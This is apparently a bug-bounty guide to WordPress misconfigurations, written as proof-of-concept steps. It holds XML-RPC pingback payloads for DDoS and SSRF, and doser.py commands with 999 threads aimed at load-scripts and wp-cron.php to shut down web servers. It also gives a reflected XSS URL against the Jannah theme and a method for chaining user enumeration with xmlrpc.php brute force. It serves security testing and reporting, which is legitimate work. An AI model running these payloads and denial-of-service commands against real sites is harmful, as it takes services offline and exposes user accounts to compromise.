Here I will try my best to mention all common security misconfigurations for Wordpress I saw before or officially referenced. I will be attaching all poc and reference as well
- Wordpress Detection
- General Scan Tool
- Directory listing
- WP Cornjob DOS
- WP User Enumeration
Well, if you are reading this you already know about technology detection tool and methods. Still adding them below
This is one of the common issue on wordpress. To get some bucks with this misconfiguration you must have to exploit it fully, and have to show the impact properly as well.
- visit site.com/xmlrpc.php
- Get the error message about POST request only
- Intercept the request and change the method GET to POST
- List all Methods<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>
- Check the
pingback.pingmentod is there or not
- Perform DDOS<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://<YOUR SERVER >:<port></string></value></param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string></value></param></params></methodCall>
- Perform SSRF (Internal PORT scan only)<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://<YOUR SERVER >:<port></string></value></param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string></value></param></params></methodCall>
Sometimes developers forget to disable the directory listing on /wp-content/uploads. So this is the common issue on wordpress sites.
Add this path to your fuzzing wordlist
This issue can down any Wordpress site under 4.9.3 So while reporting make sure that your target website is running wordpress under 4.9.3
Use the URL from my gist called loadsxploit, you will get a massive js data in response.
You can use any Dos tool i found Doser really fast and it shut down the webserver within 30 second
python3 doser.py -t 999 -g 'https://site.com/fullUrlFromLoadsxploit'
The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
- Replace <Your_WP-Site-here> to your WP-site <Your_WP-Site-here>/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D
- Wait for the pop-up!
This is another area where you can perform a DOS attack.
- visit site.com/wp-cron.php
- You will see a Blank page with 200 HTTP status code
You can use the same tool Doser for exploiting this
python3 doser.py -t 999 -g 'https://site.com/wp-cron.php'
This issue will only acceptable when target website is hiding their current users or they are not publically available. So attacker can use those user data for bruteforcing and other staff
- visit site.com/wp-json/wp/v2/users/
- You will see json data with user info in response
If you have xmlrpc.php and this User enumeration both presence there. Then you can chain them out by collecting username from wp-json and perform Bruteforce on them via xmlrpc.php. It will surely show some extra effort and increase the impact as well
Please do not depend on those issues at all. I saw people only looking for those issues and nothing else. Those are good to have a look while testing for other vulnerabilities and most of the time they work good for chaining with other low bugs.
Name: Mehedi Hasan Remon
Last modified 1yr ago